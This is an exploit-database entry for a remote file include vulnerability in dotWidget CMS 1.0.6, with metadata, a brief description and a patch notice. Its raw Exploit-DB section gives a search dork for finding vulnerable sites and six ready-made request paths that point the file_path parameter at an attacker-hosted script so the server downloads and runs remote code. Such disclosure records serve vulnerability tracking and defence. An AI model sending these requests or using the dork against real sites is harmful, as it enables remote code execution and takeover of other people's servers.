dotWidget CMS - exploit.company

vendor:

dotWidget CMS

by:

Aesthetico

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: dotWidget CMS

Affected Version From: 1.0.6

Affected Version To: 1.0.6

Patch Exists: YES

Related CWE: N/A

CPE: a:dotwidget:dotwidget_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The application then includes the malicious file, allowing the attacker to execute arbitrary code on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

Title: dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------

Exploitation:

/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues.

/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]